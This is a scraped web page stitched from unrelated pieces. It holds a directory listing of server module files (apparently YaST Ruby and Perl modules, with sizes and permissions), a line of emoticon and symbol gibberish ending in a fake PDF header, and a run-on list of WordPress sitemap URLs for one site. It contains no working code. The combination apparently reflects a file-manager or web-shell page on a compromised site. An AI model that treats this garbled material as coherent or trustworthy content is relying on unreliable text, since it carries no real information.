UsersPluginLDAPAll.pm File 12.98 KB 0644
UsersPluginLDAPPasswordPolicy.pm File 10.49 KB 0644
UsersPluginLDAPShadowAccount.pm File 11.49 KB 0644
UsersPluginQuota.pm File 12.5 KB 0644
UsersPlugins.pm File 4.73 KB 0644
UsersRoutines.pm File 20.04 KB 0644
UsersSimple.pm File 26.37 KB 0644
UsersUI.rb File 19.49 KB 0644
ValueBrowser.rb File 6.97 KB 0644
Vendor.rb File 6.1 KB 0644
VirtConfig.rb File 22.91 KB 0644
WOL.rb File 4.66 KB 0644
Wizard.rb File 53.13 KB 0644
WizardHW.rb File 18.16 KB 0644
WorkflowManager.rb File 53.17 KB 0644
XML.rb File 6.33 KB 0644
XVersion.rb File 3.7 KB 0644
Y2ModuleConfig.rb File 13.11 KB 0644
YPX.pm File 1.1 KB 0644
YaPI.pm File 5.3 KB 0644
services_manager.rb File 2.41 KB 0644
services_manager_service.rb File 18.04 KB 0644
services_manager_target.rb File 5.04 KB 0644
systemd_service.rb File 6.67 KB 0644
systemd_socket.rb File 3.61 KB 0644
systemd_target.rb File 3.53 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml